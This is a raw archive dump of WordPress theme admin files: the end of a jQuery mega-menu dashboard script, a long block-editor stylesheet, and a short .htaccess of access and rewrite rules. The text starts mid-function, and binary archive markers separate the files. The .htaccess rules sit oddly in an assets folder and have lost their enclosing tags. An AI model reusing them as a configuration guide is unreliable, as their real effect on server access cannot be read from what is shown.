true); } else { self.removeMenuInfo(titleWrap); } }); }) }; /** * * @param target * @param titleWrap * @param animation */ Module.addMenuInfo = function (target, titleWrap, animation = false) { if (titleWrap.children('.rb-mega-info').length != 0) { return; } let content = 'Mega Columns'; if (target.hasClass('mega-category-setting')) { content = 'Mega Category'; } if (animation) { $(content).hide().appendTo(titleWrap).fadeIn(250); } else { titleWrap.append(content); } } /** * * @param titleWrap */ Module.removeMenuInfo = function (titleWrap) { titleWrap.find('.rb-mega-info').fadeOut(250).remove(); } return Module; }(FOXIZ_DASHBOARD_SCRIPTS || {}, jQuery) ); FOXIZ_DASHBOARD_SCRIPTS.init(); jQuery(document).ready(function () { }); PK!. 88assets/admin/editor.cssnu[:root { --round-3: 3px; --round-5: 5px; --round-7: 7px; /*--flex-*/ --flex-gray-7: #88888812; --flex-gray-15: #88888826; --flex-gray-20: #88888833; --height-34: 34px; --height-40: 40px; --padding-40: 0 40px; /** absolute color */ --absolute-white: #fff; --absolute-light: #ddd; --absolute-dark: #242424; /** font size scales */ --rem-small: .92rem; --rem-mini: .8rem; --em-small: .92em; --em-mini: .8em; /** site font */ --body-family: 'Oxygen', sans-serif; --body-fsize: 16px; --body-fweight: 400; --body-letter-spacing: normal; --body-transform: none; --body-font-style: normal; --body-fcolor: #282828; --h1-family: 'Encode Sans Condensed', sans-serif; --h1-fsize: 40px; --h1-fweight: 700; --h1-letter-spacing: normal; --h1-transform: none; --h1-fstyle: normal; --h1-fcolor: inherit; --headline-fsize: 45px; --h2-family: 'Encode Sans Condensed', sans-serif; --h2-fsize: 28px; --h2-fweight: 700; --h2-letter-spacing: normal; --h2-transform: none; --h2-font-style: normal; --h2-fcolor: inherit; --h3-family: 'Encode Sans Condensed', sans-serif; --h3-fsize: 22px; --h3-fweight: 700; --h3-letter-spacing: normal; --h3-transform: none; --h3-font-style: normal; --h3-fcolor: inherit; --h4-family: 'Encode Sans Condensed', sans-serif; --h4-fsize: 16px; --h4-fweight: 700; --h4-letter-spacing: normal; --h4-transform: none; --h4-font-style: normal; --h4-fcolor: inherit; --h5-family: 'Encode Sans Condensed', sans-serif; --h5-fsize: 14px; --h5-fweight: 700; --h5-letter-spacing: normal; --h5-transform: none; --h5-font-style: normal; --h5-fcolor: inherit; --h6-family: 'Encode Sans Condensed', sans-serif; --h6-fsize: 13px; --h6-fweight: 600; --h6-letter-spacing: normal; --h6-transform: none; --h6-font-style: normal; --h6-fcolor: inherit; --input-family: 'Encode Sans Condensed', sans-serif; --input-fsize: 14px; --input-fweight: 400; --input-letter-spacing: normal; --input-transform: none; --input-font-style: normal; --input-fcolor: inherit; --btn-family: 'Encode Sans Condensed', sans-serif; --btn-fsize: 12px; --btn-fweight: 700; --button-letter-spacing: normal; --btn-transform: none; --button-font-style: normal; --btn-fcolor: inherit; --dwidgets-family: 'Oxygen', sans-serif; --dwidgets-fsize: 13px; --dwidgets-fweight: 600; --wmenu-letter-spacing: 0; --dwidgets-transform: none; --wmenu-font-style: normal; --meta-family: 'Encode Sans Condensed', sans-serif; --meta-fsize: 13px; --meta-fweight: 400; --emeta-letter-spacing: normal; --meta-transform: none; --emeta-font-style: normal; --excerpt-fsize: 14px; --excerpt-color: #666; --g-color: #ff184e; } .block-editor-block-list__layout { max-width: 770px; margin: auto; } .wp-block, .wp-block[data-align="full"], .wp-block[data-align="wide"] { max-width: 770px; } .editor-styles-wrapper * { -ms-word-wrap: break-word; word-wrap: break-word; } .editor-styles-wrapper li, .editor-styles-wrapper p, .editor-styles-wrapper p.wp-block-paragraph { font-family: var(--body-family); font-size: var(--body-fsize); font-weight: var(--body-fweight); font-style: var(--body-font-style); line-height: var(--body-line-height, 1.7); letter-spacing: var(--body-letter-spacing); text-transform: var(--body-transform); color: var(--body-fcolor); } .editor-post-title__block .editor-post-title__input, .rtl .editor-post-title__block .editor-post-title__input { font-family: var(--headline-family, var(--h1-family)); font-size: var(--headline-fsize, var(--h1-fsize)); font-weight: var(--headline-fweight, var(--h1-fweight)); font-style: var(--headline-font-style, var(--h1-font-style)); letter-spacing: var(--headline-letter-spacing, var(--h1-letter-spacing)); text-transform: var(--headline-transform, var(--h1-transform)); color: var(---headline-fcolor, var(--h1-fcolor)); } .editor-styles-wrapper h1 { font-family: var(--h1-family); font-size: var(--h1-fsize); font-weight: var(--h1-fweight); font-style: var(--h1-font-style); line-height: var(--h1-line-height, 1.2); letter-spacing: var(--h1-letter-spacing); text-transform: var(--h1-transform); color: var(--h1-fcolor); } .editor-styles-wrapper h2 { font-family: var(--h2-family); font-size: var(--h2-fsize); font-weight: var(--h2-fweight); font-style: var(--h2-font-style); line-height: var(--h2-line-height, 1.25); letter-spacing: var(--h2-letter-spacing); text-transform: var(--h2-transform); color: var(--h2-fcolor); } .editor-styles-wrapper h3 { font-family: var(--h3-family); font-size: var(--h3-fsize); font-weight: var(--h3-fweight); font-style: var(--h3-font-style); line-height: var(--h3-line-height, 1.3); letter-spacing: var(--h3-letter-spacing); text-transform: var(--h3-transform); color: var(--h3-fcolor); } .editor-styles-wrapper h4 { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); font-style: var(--h4-font-style); line-height: var(--h4-line-height, 1.45); letter-spacing: var(--h4-letter-spacing); text-transform: var(--h4-transform); color: var(--h4-fcolor); } .editor-styles-wrapper h5 { font-family: var(--h5-family); font-size: var(--h5-fsize); font-weight: var(--h5-fweight); font-style: var(--h5-font-style); line-height: var(--h5-line-height, 1.5); letter-spacing: var(--h5-letter-spacing); text-transform: var(--h5-transform); color: var(--h5-fcolor); } .editor-styles-wrapper h6 { font-family: var(--h6-family); font-size: var(--h6-fsize); font-weight: var(--h6-fweight); font-style: var(--h6-font-style); line-height: var(--h6-line-height, 1.5); letter-spacing: var(--h6-letter-spacing); text-transform: var(--h6-transform); color: var(--h6-fcolor); } /* Content Width */ .wp-block[data-align="full"] .wp-block[data-align="wide"], .wp-block[data-align="full"] .wp-block[data-align="wide"] { width: 95%; max-width: 100%; } .wp-block .wp-block[data-type="core/group"]:not([data-align="full"]):not([data-align="wide"]):not([data-align="left"]):not([data-align="right"]), .wp-block .wp-block[data-type="core/cover"]:not([data-align="full"]):not([data-align="wide"]):not([data-align="left"]):not([data-align="right"]) { max-width: 610px; margin-right: auto; margin-left: auto; } .wp-block .wp-block[data-align="full"] { margin-right: 0; margin-left: 0; } *[data-align="right"] .wp-block-edit, *[data-align="left"] .wp-block-edit { max-width: 50%; } .edit-post-layout__metaboxes:not(:empty) .edit-post-meta-boxes-area { width: 90%; margin: auto; } .editor-styles-wrapper select { line-height: 22px; position: relative; max-width: 100%; padding: 10px; border-color: var(--flex-gray-15); border-radius: var(--round-5); outline: none !important; background-color: transparent; } /* Typography */ .editor-styles-wrapper, .rtl .editor-styles-wrapper { text-rendering: optimizeLegibility; -webkit-font-smoothing: antialiased; } .editor-styles-wrapper strong { font-weight: 700; } .editor-styles-wrapper ol, .editor-styles-wrapper ul { padding-left: 1rem !important; list-style-type: decimal; } .editor-styles-wrapper li > ol, .editor-styles-wrapper li > ul { padding-top: .5rem; } .editor-styles-wrapper ol li, .editor-styles-wrapper ol ol, .editor-styles-wrapper ol ul, .editor-styles-wrapper ul li, .editor-styles-wrapper ul ol, .editor-styles-wrapper ul ul { margin-bottom: 7px; } .editor-styles-wrapper .block-library-list ol, .editor-styles-wrapper .block-library-list ul { margin-right: 0; margin-left: 0; padding-left: 1em; } .editor-styles-wrapper pre { font-family: Courier, monospace; font-size: .9em; overflow: auto; max-width: 100%; margin-bottom: 2rem; padding: 20px; background-color: rgba(0, 0, 0, .05); } .editor-styles-wrapper em { font-weight: normal; font-style: italic; } .editor-styles-wrapper ul { list-style: circle !important; } .editor-styles-wrapper ul ul { list-style: disc !important; } .editor-styles-wrapper code { font-family: Courier, monospace; padding: 2px; background-color: rgba(0, 0, 0, .05); } .editor-styles-wrapper kbd, .editor-styles-wrapper pre, .editor-styles-wrapper samp { font-family: Courier, monospace; padding: 20px; background-color: rgba(0, 0, 0, .05); } .editor-styles-wrapper .wp-caption-text { font-size: 13px; font-style: italic; line-height: 20px; margin-bottom: 25px; margin-left: 0; padding-top: 5px; color: #444; background: none !important; } .editor-styles-wrapper li, .editor-styles-wrapper p, .editor-styles-wrapper p.wp-block-paragraph { line-height: 1.7; } .wp-block-paragraph.has-drop-cap:not(:focus)::first-letter { font-size: 5em; font-weight: inherit; line-height: .825; } .editor-styles-wrapper .wp-block-cover-image .wp-block-cover__inner-container { width: calc(100% - 80px); margin: 0 auto; } .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="right"], .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="left"] { height: auto; max-height: none; } .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="left"] .wp-block-cover { text-align: left; } .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="right"] .wp-block-cover { text-align: right; } .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="right"] .block-editor-block-list__block-edit, .editor-styles-wrapper .wp-block[data-type="core/cover"][data-align="left"] .block-editor-block-list__block-edit { float: none; max-width: 100%; margin-right: 0; margin-left: 0; } .editor-styles-wrapper .wp-block-cover a { color: inherit; } .editor-styles-wrapper .wp-block-cover__inner-container { line-height: 1.25; } .editor-styles-wrapper .wp-block-cover__inner-container * { line-height: inherit; } .wp-block-cover__inner-container p:last-child { margin-bottom: 0; } .wp-block-cover__inner-container p.block-editor-block-list__block { line-height: 1.25; color: inherit; } .wp-block-cover__inner-container p.block-editor-block-list__block:last-child { margin-top: 0; } /** block heading */ a { line-height: inherit; text-decoration: none; color: inherit; outline: none; } a:hover, a:focus { text-decoration: none; } .editor-styles-wrapper a:hover, .editor-styles-wrapper select:hover { color: var(--g-color); } .wp-block-cover h2 strong, .wp-block-cover .wp-block-cover-text strong { font-weight: bolder; } .wp-block[data-type="core/cover"][data-align="left"] .wp-block-cover p, .wp-block[data-type="core/cover"][data-align="right"] .wp-block-cover p { padding-right: 0; padding-left: 0; } /* Gallery */ figure.wp-block-gallery { margin-bottom: 1rem; } .wp-block-gallery .blocks-gallery-image figcaption, .wp-block-gallery .blocks-gallery-item figcaption, .wp-block-gallery .gallery-item .gallery-caption { font-size: 0.71111em; line-height: 1.6; } figcaption:before, .wp-caption-text:before, dd.wp-caption-dd:before { display: inline-block; width: 30px; height: .3em; margin-right: 7px; content: ''; border-top: 1px solid; } figcaption, .wp-caption-text { font-family: var(--meta-family); font-weight: var(--meta-fweight); font-style: var(--emeta-font-style); letter-spacing: var(--emeta-letter-spacing); text-transform: var(--meta-transform); } .blocks-gallery-caption { text-align: inherit; } /* Button */ .wp-block-button, .wp-block-button__link { font-family: var(--btn-family); font-size: var(--btn-fsize); font-weight: var(--btn-fweight) !important; font-style: var(--button-font-style) !important; display: inline-block; margin: 0; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; text-decoration: none !important; letter-spacing: var(--button-letter-spacing); text-transform: var(--btn-transform); color: #fff !important; border: none; border-radius: var(--round-5); box-shadow: none; overflow-wrap: break-word; } .wp-block-button__link { text-align: center; } .wp-block-group div[data-type="core/button"] { width: 100%; } .wp-block-button:not(.is-style-outline) .wp-block-button__link { background-color: #32373c; } .wp-block-button.is-style-outline, .wp-block-button__link.no-border-radius, .wp-block-button .wp-block-button__link.no-border-radius { -webkit-border-radius: 0; border-radius: 0; } .wp-block-button.is-style-outline, .wp-block-button.is-style-outline:hover, .wp-block-button.is-style-outline:focus, .wp-block-button.is-style-outline:active { color: var(--g-color); background: transparent; } .wp-block-button.is-style-outline .wp-block-button__link, .wp-block-button.is-style-outline:hover .wp-block-button__link, .wp-block-button.is-style-outline:focus .wp-block-button__link, .wp-block-button.is-style-outline:active .wp-block-button__link { background: transparent; } .wp-block-button.is-style-outline .wp-block-button__link:not(.has-text-color), .wp-block-button.is-style-outline:hover .wp-block-button__link:not(.has-text-color), .wp-block-button.is-style-outline:focus .wp-block-button__link:not(.has-text-color), .wp-block-button.is-style-outline:active .wp-block-button__link:not(.has-text-color) { color: #333; } /* Blockquote */ .wp-block-quote, .wp-block-pullquote, .wp-block-quote:not(.is-large):not(.is-style-large) { font-family: var(--quote-family, var(--h1-family)); font-weight: var(--quote-fweight, var(--h1-fweight)); padding: 0 1em; letter-spacing: var(--quote-letter-spacing, var(--h1-letter-spacing)); text-transform: var(--quote-transform, var(--h1-transform)); color: var(--quote-fcolor, var(--h1-fcolor)); border: none; } .wp-block-quote:before { font-family: var(--quote-family, var(--h1-family)); font-size: 2rem; line-height: .75; position: absolute; left: 0; content: "“"; } .wp-block-pullquote { font-size: 1.75em !important; } .wp-block-quote.is-large .wp-block-quote__citation { text-align: left; } .wp-block-quote.has-text-align-left { text-align: left; } .editor-styles-wrapper p.has-drop-cap:not(:focus):first-letter { font-size: 5rem; font-weight: bold; line-height: .8; } blockquote p { font-family: inherit !important; font-size: inherit !important; font-weight: inherit !important; line-height: inherit; letter-spacing: inherit; color: inherit !important; } .wp-block-cover .wp-block-cover__inner-container a { text-decoration: none; color: #fff; } .wp-block-cover .wp-block-cover__inner-container a:hover { text-decoration: underline; } .wp-block-pullquote.is-style-solid-color blockquote { margin-bottom: 10px; padding: 30px; } .wp-block-quote__citation, .wp-block-quote cite, .wp-block-quote footer, .wp-block-pullquote__citation { font-family: var(--meta-family); font-size: var(--rem-small); font-weight: var(--meta-fweight); font-style: italic; line-height: 1; } .wp-block-quote__citation:before, .wp-block-quote cite:before, .wp-block-quote footer:before, .wp-block-pullquote__citation:before { display: inline-block; width: 30px; height: .3em; margin-right: 7px; content: ''; color: var(--g-color); border-top: 1px solid; } .wp-block-quote.is-large, .wp-block-quote.is-style-large { padding-right: 0; padding-left: 0; text-align: left; } .wp-block-quote.has-text-align-right { text-align: right !important; } .wp-block-quote.is-large p:first-child:before, .wp-block-quote.is-style-large p:first-child:before { font-size: 44px; } .wp-block-image figcaption, .wp-block-embed figcaption { font-family: var(--meta-family); font-weight: var(--meta-fweight); font-style: var(--emeta-font-style); text-align: left; letter-spacing: var(--emeta-letter-spacing); text-transform: var(--meta-transform); } .wp-block-image figcaption:before, .wp-block-embed figcaption:before { display: inline-block; width: 30px; height: .3em; margin-right: 7px; content: ''; border-top: 1px solid; } .wp-block[data-align=center] > .wp-block-image figcaption { text-align: center; } /** rich text */ .editor-styles-wrapper .editor-block-list__layout a, .block-editor-rich-text__editable a { font-weight: 700; font-style: normal; } .wp-block-pullquote blockquote { word-break: break-word; hyphens: auto; } .wp-block-pullquote blockquote::before { font-family: var(--body-family); font-size: 2.5em; font-weight: 400; line-height: 0; position: relative; left: 0; display: block; margin-bottom: 10px; content: "“"; color: var(--g-color); } .wp-block-freeform.block-library-rich-text__tinymce blockquote:before { font-family: var(--body-family); font-size: 2rem; font-weight: 400; line-height: .75; position: absolute; left: 0; content: "“"; color: var(--g-color); } .wp-block-freeform.block-library-rich-text__tinymce blockquote { padding: 0 1em; border-left: none; box-shadow: unset; } .wp-block-freeform.block-library-rich-text__tinymce blockquote p { font-family: var(--h1-family) !important; font-weight: var(--h1-fweight) !important; color: var(--h1-fcolor) !important; } .wp-block-quote::before { font-family: var(--body-family); color: var(--g-color); } .wp-block-quote.is-style-large { padding: 0 1.75em; } .wp-block-quote.is-style-large p { font-size: 1.5em !important; } .wp-block-quote.is-style-large cite { text-align: inherit; } .wp-block-quote.is-style-large cite br { display: none; } .wp-block-pullquote { padding: .5em 0; } .wp-block-pullquote.is-style-solid-color blockquote { width: calc(100% - (2 * 1em)); max-width: calc(100% - (2 * 1em)); } .wp-block-pullquote.is-style-solid-color blockquote a, .wp-block-pullquote.is-style-solid-color blockquote.has-text-color p, .wp-block-pullquote.is-style-solid-color blockquote.has-text-color a { color: inherit; } .wp-block-pullquote.is-style-solid-color blockquote:before, .wp-block-pullquote.is-style-solid-color cite:before, .wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation:before { color: inherit; } .wp-block-pullquote.is-style-solid-color:not(.has-background-color) { background-color: var(--g-color); } .wp-block[data-type="core/pullquote"] em, .wp-block[data-type="core/pullquote"][data-align="left"] em, .wp-block[data-type="core/pullquote"][data-align="right"] em { font-style: normal; } .wp-block[data-type="core/pullquote"][data-align="left"] .editor-block-list__block-edit, .wp-block[data-type="core/pullquote"][data-align="right"] .editor-block-list__block-edit { width: calc(4 * (100vw / 12)); max-width: 50%; } .wp-block[data-type="core/pullquote"][data-align="left"] .editor-block-list__block-edit .wp-block-pullquote:not(.is-style-solid-color), .wp-block[data-type="core/pullquote"][data-align="right"] .editor-block-list__block-edit .wp-block-pullquote:not(.is-style-solid-color) { padding: 0; } .wp-block[data-type="core/pullquote"][data-align="left"] .editor-block-list__block-edit .wp-block-pullquote.is-style-solid-color, .wp-block[data-type="core/pullquote"][data-align="right"] .editor-block-list__block-edit .wp-block-pullquote.is-style-solid-color { padding: 1em; } .wp-block-file .wp-block-file__textlink { text-decoration: underline; color: var(--g-color); } .wp-block-file .wp-block-file__textlink:hover { text-decoration: none; color: var(--g-color); } .wp-block-file .wp-block-file__button { font-size: 0.88889em; font-weight: bold; line-height: 1.8; display: table; border-radius: 5px; background-color: var(--g-color); } .wp-block-file .wp-block-file__button-richtext-wrapper { display: block; margin-top: calc(0.75 * 1em); margin-left: 0; } .wp-block-verse { padding: 0; } .wp-block-code { border-radius: 0; } .editor-rich-text__editable code { padding: 0 7px; -webkit-border-radius: 4px; border-radius: 4px; background-color: rgba(0, 0, 0, .07); } .wp-block-freeform.block-library-rich-text__tinymce code { background: rgba(0, 0, 0, .04); } .wp-block-table td, .wp-block-table th { border-color: #eee; } .wp-block-separator:not(.is-style-dots) { position: relative; display: block; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: 1; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots) { position: relative; display: block; width: 100%; max-width: 100%; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: .25; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } hr.wp-block-separator:not(.is-style-dots):not(.is-style-wide) { max-width: 100px; margin-left: 0; } .wp-block-separator.is-style-dots:before { padding-left: 1.5rem; letter-spacing: 1.5rem; } body.post-type-post .editor-styles-wrapper .edit-post-visual-editor { flex: 0 0 100%; } .wp-block-table { width: 100%; margin-bottom: 2em; border-spacing: 0; border-collapse: collapse; border-bottom: 1px solid rgba(0, 0, 0, .025); border-left: 1px solid rgba(0, 0, 0, .025); } .wp-block-table table thead { color: #fff; background-color: #333; } .wp-block-table tbody tr:nth-child(2n) { background-color: rgba(0, 0, 0, .025); } .wp-block-table__.cell-content { text-align: left; } .wp-block-pullquote__citation, .wp-block-pullquote cite, .wp-block-pullquote footer { text-transform: none; } /* WP blocks */ .editor-styles-wrapper ul.wp-block-archives, .editor-styles-wrapper .wp-block-archives-dropdown, .editor-styles-wrapper .wp-block-categories { overflow: hidden; width: 350px; max-width: 350px; margin-left: 0; padding-left: 0 !important; } .wp-block-gallery ul.blocks-gallery-grid { padding: 0 !important; } .editor-styles-wrapper div[data-align="center"] .wp-block-categories, .editor-styles-wrapper div[data-align="center"] ul.wp-block-archives { margin-right: auto; margin-left: auto; } .editor-styles-wrapper .wp-block-latest-posts, .editor-styles-wrapper .wp-block-latest-comments { margin-left: 0; padding-left: 0 !important; } .editor-styles-wrapper .wp-block-latest-posts__post-date, .editor-styles-wrapper .wp-block-latest-comments__comment-date { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--wmenu-font-style) !important; line-height: 1.4; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--wmenu-letter-spacing); text-transform: var(--dwidgets-transform); } .editor-styles-wrapper .wp-block-latest-comments__comment-link, .editor-styles-wrapper .wp-block-latest-posts__list a, .edit-post-layout__content .wp-block-latest-comments__comment-link, .edit-post-layout__content .wp-block-latest-posts__list a, .edit-post-editor-regions__content .wp-block-latest-comments__comment-link, .edit-post-editor-regions__content .wp-block-latest-posts__list a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--wmenu-font-style) !important; line-height: 1.4; display: block; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--wmenu-letter-spacing); text-transform: var(--dwidgets-transform); } .editor-styles-wrapper footer.wp-block-latest-comments__comment-meta > *:not(time) { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--wmenu-font-style) !important; line-height: 1.4; display: inline-block !important; margin-right: 5px; } .editor-styles-wrapper footer.wp-block-latest-comments__comment-meta > .wp-block-latest-comments__comment-link { font-size: var(--h4-fsize); } .editor-styles-wrapper .wp-block-latest-posts li, .edit-post-layout__content .wp-block-latest-posts li, .edit-post-editor-regions__content .wp-block-latest-posts li { position: relative; display: block; margin-bottom: 20px; } .editor-styles-wrapper .wp-block-latest-comments__comment, .edit-post-layout__content .wp-block-latest-comments__comment, .edit-post-editor-regions__content .wp-block-latest-comments__comment { position: relative; display: block; margin-left: 0; } .editor-styles-wrapper .wp-block-latest-comments__comment article, .edit-post-layout__content .wp-block-latest-comments__comment article, .edit-post-editor-regions__content .wp-block-latest-comments__comment article { margin-bottom: 20px; } .editor-styles-wrapper .wp-block-latest-comments__comment-excerpt, .edit-post-layout__content .wp-block-latest-comments__comment-excerpt, .edit-post-editor-regions__content .wp-block-latest-comments__comment-excerpt { font-size: .85em; line-height: 1.7; margin-top: 12px; } .editor-styles-wrapper .wp-block-latest-comments__comment-excerpt p, .edit-post-layout__content .wp-block-latest-comments__comment-excerpt p, .edit-post-editor-regions__content .wp-block-latest-comments__comment-excerpt p { font-size: inherit; line-height: inherit; margin: 0; } .editor-styles-wrapper .wp-block-categories, .editor-styles-wrapper .wp-block-archives, .editor-styles-wrapper .wp-block-categories ul, .editor-styles-wrapper .wp-block-categories ol, .editor-styles-wrapper .wp-block-archives ul, .editor-styles-wrapper .wp-block-archives ol, .editor-styles-wrapper .wp-block-latest-posts { padding-left: 0; list-style: none !important; text-align: left; } .editor-styles-wrapper .wp-block-categories__list a, .editor-styles-wrapper .wp-block-archives-list a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--wmenu-font-style) !important; line-height: 1.4; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--wmenu-letter-spacing); text-transform: var(--dwidgets-transform); } .editor-styles-wrapper .wp-block-categories__list a:after, .editor-styles-wrapper .wp-block-archives-list a:after { font-size: 10px; line-height: 0; position: absolute; top: 50%; margin-top: -1px; margin-left: 7px; letter-spacing: .75em; opacity: .5; color: inherit; } .editor-styles-wrapper .wp-block-categories-list ul ul, .editor-styles-wrapper .wp-block-archives-list ul ul { margin-top: 15px; margin-left: 15px; padding: 0; } .editor-styles-wrapper .wp-block-archives-dropdown select { width: 100%; } .editor-styles-wrapper .wp-block-categories__post-count, .editor-styles-wrapper .wp-block-archives__post-count { font-size: 11px; line-height: 18px; float: right; min-width: 18px; padding: 0 3px; text-align: center; color: #fff; background-color: #333; } .editor-styles-wrapper .block-editor-block-list__block[data-align=full], .block-editor-block-list__layout .block-editor-block-list__block[data-align=full] { margin-right: auto; margin-left: auto; } .editor-styles-wrapper .block-editor-block-list__block[data-align=full] > .block-editor-block-list__block-edit, .block-editor-block-list__layout .block-editor-block-list__block[data-align=full] > .block-editor-block-list__block-edit { margin-right: -28px !important; margin-left: -28px !important; } .editor-styles-wrapper .block-editor-block-list__block[data-align=full] > .block-editor-block-list__block-edit, .block-editor-block-list__layout .block-editor-block-list__block[data-align=full] > .block-editor-block-list__block-edit { margin-right: 0 !important; margin-left: 0 !important; } .wp-block[data-align=full] { margin-right: auto !important; margin-left: auto !important; padding-right: 0 !important; padding-left: 0 !important; } .wp-block-cover .block-editor-block-list__block[data-type="core/paragraph"] p { font-size: 2em !important; line-height: 1.25; } .editor-styles-wrapper .wp-block-media-text > .block-editor-block-list__layout > .block-editor-block-list__block { line-height: 1.4; margin-top: 0; margin-bottom: 1rem; } .editor-styles-wrapper .alignleft { margin-right: 1.5em; } .editor-styles-wrapper .wp-block-quote.is-large, .editor-styles-wrapper .wp-block-quote.is-style-large { text-align: left; } .wp-block-calendar tbody td#today { background-color: var(--g-color); } .wp-block-calendar tbody td#today a { text-decoration: none; color: #fff; } .editor-styles-wrapper ul.wp-block-rss { margin-left: 0; padding-left: 0; list-style: none !important; } .editor-styles-wrapper ul.wp-block-rss a { color: inherit; } .wp-block-search .wp-block-search__label { font-size: .85rem; font-weight: 400; line-height: 1.7; } .wp-block-search .wp-block-search__input { padding: 10px 25px; border: none; border-radius: 0; background-color: rgba(0, 0, 0, .025); } .wp-block-group.has-background .wp-block-button { padding-left: 0; } .wp-block-code { max-width: 100%; padding: 20px; background-color: rgba(0, 0, 0, .05); } .wp-block-code textarea { background: none; } .block-library-rich-text__tinymce.mce-content-body { line-height: 1.5; } table.mce-item-table { width: 100%; margin-bottom: 2rem; border-spacing: 0; border-collapse: collapse; border-bottom: 1px solid rgba(0, 0, 0, .025); border-left: 1px solid rgba(0, 0, 0, .025); } table.mce-item-table thead { color: #fff; background-color: #333; } table.mce-item-table thead th { border-color: rgba(255, 255, 255, .1); } table.mce-item-table th, table.mce-item-table td { font-weight: 400; padding: 5px 10px; text-align: left; border-top: 1px solid rgba(0, 0, 0, .025); border-right: 1px solid rgba(0, 0, 0, .025); } table.mce-item-table tbody tr:nth-child(2n), table.mce-item-table tbody tr:nth-child(2n) { background-color: rgba(0, 0, 0, .025); } table.mce-item-table td { display: table-cell; vertical-align: inherit; } dt { font-weight: 700; } .wp-block-freeform.block-library-rich-text__tinymce table.mce-item-table th a, .wp-block-freeform.block-library-rich-text__tinymce a { font-weight: 700; color: inherit; } #wp-calendar { position: relative; width: 100%; margin-bottom: 7px; } #wp-calendar tfoot { position: absolute; top: 0; right: 0; left: 0; } #wp-calendar tfoot td { vertical-align: top; border: none; } #wp-calendar th, #wp-calendar td { line-height: 40px; padding: 0; text-align: center; } #wp-calendar tbody a { font-weight: 700; display: block; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; } #wp-calendar tbody td { font-size: var(--rem-small); padding: 0; } #wp-calendar td#today { font-weight: 700; } .wp-calendar-nav a { font-size: var(--em-mini); -webkit-transition: var(--effect); transition: var(--effect); text-decoration: inherit; color: var(--meta-fcolor); } #wp-calendar caption { font-size: var(--rem-small); font-weight: 700; margin-bottom: 7px; } #wp-calendar tfoot a:hover { text-decoration: underline; } .calendar_wrap table thead { font-weight: 700; background-color: var(--flex-gray-7); } .editor-styles-wrapper .wp-block-latest-posts li a:before { font-size: 15px; font-weight: 700; position: absolute; top: 50%; left: 0; display: inline; height: 22px; margin-top: -11px; margin-right: 6px; content: "+"; } .editor-styles-wrapper .wp-block-latest-posts li a { position: relative; padding-left: 12px; } .editor-styles-wrapper .wp-block-search__inside-wrapper { position: relative; display: flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; border-radius: var(--round-7); background-color: var(--flex-gray-7); } .editor-styles-wrapper .wp-block-search__inside-wrapper .wp-block-search__button.rich-text { margin: 0; border: none; border-left: 2px solid var(--g-color); } .editor-styles-wrapper p.wp-block-tagcoloroud a { font-size: var(--dwidgets-fsize) !important; line-height: 1; margin: 2px; padding: 7px 10px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .editor-styles-wrapper .wp-block-rss__item-title { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); position: relative; display: block; letter-spacing: var(--h4-letter-spacing); } .mce-content-body > p > img { margin-top: 1rem; margin-bottom: 1rem; } .mce-content-body > figure.wp-caption.alignleft, .mce-content-body > figure.wp-caption.alignnone, .mce-content-body > figure.wp-caption.aligncenter, .mce-content-body > figure.wp-caption.alignright { margin-top: 1rem; } .wp-block-freeform.block-library-rich-text__tinymce .wp-caption.alignleft { margin: 0.5em 1em 0.5em 0; } .wp-block-freeform.block-library-rich-text__tinymce .wp-caption.alignright { margin: 0.5em 0 0.5em 1em; } /** responsive */ @media only screen and (min-width: 600px) { .edit-post-layout__content-block-list__layout .edit-post-layout__content-block-list__block[data-align=full] > .edit-post-layout__content-block-list__block-edit { margin-right: -28px; margin-left: -28px; } } @media only screen and (min-width: 768px) { .wp-block-pullquote.is-style-solid-color blockquote { max-width: 80%; } .wp-block[data-type="core/pullquote"][data-align="full"] .wp-block-pullquote blockquote { max-width: calc(80% - 128px); } .wp-block[data-type="core/cover"][data-align="wide"] h2, .wp-block[data-type="core/cover"][data-align="wide"] .wp-block-cover-text, .wp-block[data-type="core/cover"][data-align="full"] h2, .wp-block[data-type="core/cover"][data-align="full"] .wp-block-cover-text { max-width: calc(8 * (100vw / 12)); } } @media only screen and (min-width: 1168px) { .wp-block[data-type="core/cover"][data-align="wide"] h2, .wp-block[data-type="core/cover"][data-align="wide"] .wp-block-cover-text, .wp-block[data-type="core/cover"][data-align="full"] h2, .wp-block[data-type="core/cover"][data-align="full"] .wp-block-cover-text { max-width: calc(6 * (100vw / 12)); } }PK!.|assets/admin/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK! 